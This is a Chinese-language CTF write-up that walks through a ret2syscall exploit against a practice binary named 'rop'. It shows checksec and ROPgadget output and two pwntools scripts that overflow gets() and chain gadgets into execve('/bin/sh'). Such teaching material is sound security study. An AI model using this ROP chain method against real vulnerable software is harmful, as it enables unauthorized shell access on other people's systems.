ret2syscall

ret2syscall，即控制程序执行系统调用，获取 shell

step1 32bit or 64bit?

1
2

pwn3文件$ file rop
rop: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=2bff0285c2706a147e7b150493950de98f182b78, with debug_info, not stripped

step2 checksec

源程序为 32 位，开启了 NX 保护

pwn3文件$ checksec rop
[*] '/home/pwn/桌面/pwn3文件/rop'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

step3 IDA32

直接F5反汇编，伪代码如下：

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp+1Ch] [ebp-64h] BYREF

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("This time, no system() and NO SHELLCODE!!!");
  puts("What do you plan to do?");
  gets(&v4);
  return 0;
}

step4 系统调用

由于开启了NX，我们不能直接利用程序中的某一段代码或者自己填写代码来获得 shell，所以我们利用程序中的 gadgets（小片段）组合成ROP（返回导向编程）来获得 shell，而对应的 shell 获取则是利用系统调用。

关于系统调用的知识：
Linux 的32位系统调用通过 int 80h （int 0x80）实现，用系统调用号来区分入口函数

应用程序调用系统调用的过程是：
1、把系统调用的编号存入 EAX
2、把函数参数存入其它通用寄存器
3、触发 0x80 号中断（int 0x80）

比如说，我们利用如下系统调用来获取 shell

1	execve("/bin/sh",NULL,NULL)

那么我们要做的就是

1.eax=0xb
2.ebx=/bin/sh 的地址
  ecx=0
  edx=0
3.触发int 0x80

1.查看系统调用号

1	command(命令)：cat /usr/include/asm/unistd_32.h \| grep execve

1
2
3

pwn3文件$ cat /usr/include/asm/unistd_32.h | grep execve
#define __NR_execve 11
#define __NR_execveat 358

可以知道系统调用号为 11，转换为 16 进制是 0xb，所以 eax 中应该存放 0xb

2.寄存器传参

查找寄存器eax

1	command：ROPgadget --binary rop --only 'pop\|ret' \| grep 'eax'

pwn3文件$ ROPgadget --binary rop  --only 'pop|ret' | grep 'eax'
0x0809ddda : pop eax ; pop ebx ; pop esi ; pop edi ; ret
0x080bb196 : pop eax ; ret
0x0807217a : pop eax ; ret 0x80e
0x0804f704 : pop eax ; ret 3
0x0809ddd9 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret

pop_eax_ret = 0x080bb196

同样用此命令查找其他寄存器：EBX ECX EDX，即将EAX换成上述寄存器

1	ROPgadget --binary rop --only 'pop\|ret' \| grep 'ebx'

pwn3文件$ ROPgadget --binary rop  --only 'pop|ret' | grep 'ebx'
0x0809dde2 : pop ds ; pop ebx ; pop esi ; pop edi ; ret
0x0809ddda : pop eax ; pop ebx ; pop esi ; pop edi ; ret
0x0805b6ed : pop ebp ; pop ebx ; pop esi ; pop edi ; ret
0x0809e1d4 : pop ebx ; pop ebp ; pop esi ; pop edi ; ret
0x080be23f : pop ebx ; pop edi ; ret
0x0806eb69 : pop ebx ; pop edx ; ret
0x08092258 : pop ebx ; pop esi ; pop ebp ; ret
0x0804838b : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080a9a42 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x10
0x08096a26 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x14
0x08070d73 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0xc
0x08048547 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 4
0x08049bfd : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 8
0x08048913 : pop ebx ; pop esi ; pop edi ; ret
0x08049a19 : pop ebx ; pop esi ; pop edi ; ret 4
0x08049a94 : pop ebx ; pop esi ; ret
0x080481c9 : pop ebx ; ret
0x080d7d3c : pop ebx ; ret 0x6f9
0x08099c87 : pop ebx ; ret 8
0x0806eb91 : pop ecx ; pop ebx ; ret
0x0806336b : pop edi ; pop esi ; pop ebx ; ret
0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret		//#########定位#########
0x0809ddd9 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret
0x0806eb68 : pop esi ; pop ebx ; pop edx ; ret
0x0805c820 : pop esi ; pop ebx ; ret
0x08050256 : pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x0807b6ed : pop ss ; pop ebx ; ret

由于其中一段地址可以控制3个寄存器，故直接使用该地址

1	0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret

pop_edx_ecx_ebx_ret = 0x0806eb90

3.int 0x80

1	commmand：ROPgadget --binary rop --only 'int'

pwn3文件$ ROPgadget --binary rop  --only 'int'
Gadgets information
============================================================
0x08049421 : int 0x80

Unique gadgets found: 1

int_0x80 = 0x08049421

4./bin/sh

1	command：ROPgadget --binary rop --string '/bin/sh'

pwn3文件$ ROPgadget --binary rop  --string '/bin/sh'
Strings information
============================================================
0x080be408 : /bin/sh

binsh = 0x80be408，是 ‘/bin/sh’ ，不是 ‘bin/sh’，错误示范如下，导致返回地址错误

ROP$ ROPgadget --binary ret2syscall --string 'bin/sh'
Strings information
============================================================
0x080be409 : bin/sh

step5 exp

                             +-----------------+
                             |   int_0x80      | 
                             +-----------------+
                             |    'bin/sh'     |
                             +-----------------|                 
                             |        0        |
                             +-----------------|                 
                             |        0        |
                             +-----------------+                 
                             |  pop_other_ret  |
                             +-----------------+
                             |       0xb       |  
                             +-----------------+
                             |   pop_eax_ret   | 
                      ebp--->+-----------------+
                             |                 |
                             |                 |
                             |                 |
                             |                 |
                             +-----------------+                 
                             |        v4       |
            v4起始,ebp-0x6C-->+-----------------+  
# pop_other_ret = pop_edx_ecx_ebx_ret，传参顺序为edx-->ecx-->ebx
# 调用了gets()函数，待会要返回main()，故pop_eax_ret前有个新的ebp，要填充4字节覆盖。而其他的pop_ret只是gadget，不用在其前面加ebp来填充4字节
# 由于ROP是连续的gadget，故视图如上

#写法1
from pwn import *
sh = process('./rop')
pop_eax_ret = 0x080bb196
pop_edx_ecx_ebx_ret = 0x0806eb90
int_0x80 = 0x08049421
bin_sh = 0x80be408
payload = flat(['A' * 112, pop_eax_ret, 0xb, pop_edx_ecx_ebx_ret, 0, 0, bin_sh, int_0x80])
#flat模块能将pattern字符串和地址结合并且转为字节模式
sh.sendline(payload)
sh.interactive()

#写法2
from pwn import *
p=process('./rop')
int_0x80=0x8049421
bin_sh=0x80be408
pop_other_ret=0x806eb90
pop_eax_ret=0x80bb196
payload='A'*112+p32(pop_eax_ret)+p32(0xb)+p32(pop_other_ret)+p32(0)+p32(0)+p32(bin_sh)+p32(int_0x80)
p.sendline(payload)
p.interactive()

填充多少个字符这里不多赘述，可以看ret2text